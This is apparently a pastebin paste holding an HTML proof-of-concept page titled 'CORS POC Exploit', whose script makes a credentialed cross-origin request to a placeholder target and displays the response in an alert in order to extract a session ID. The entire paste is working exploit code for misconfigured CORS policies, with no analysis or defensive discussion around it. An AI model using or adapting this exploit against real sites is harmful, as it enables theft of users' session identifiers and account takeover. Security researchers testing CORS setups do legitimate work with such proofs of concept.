Untitled

a guest Jul 6th, 2017 500 Never
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
// Cross-origin, credentialed GET. The response is readable here only if the
// target answers with Access-Control-Allow-Origin set to this page's origin
// and Access-Control-Allow-Credentials: true.
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Display the response body, which the PoC expects to contain the SID
      alert(this.responseText);
    }
  };
  xhttp.open("GET", "https://target.com/info/", true);
  xhttp.withCredentials = true; // include the browser's cookies for target.com
  xhttp.send();
}
</script>
</center>

</body>
</html>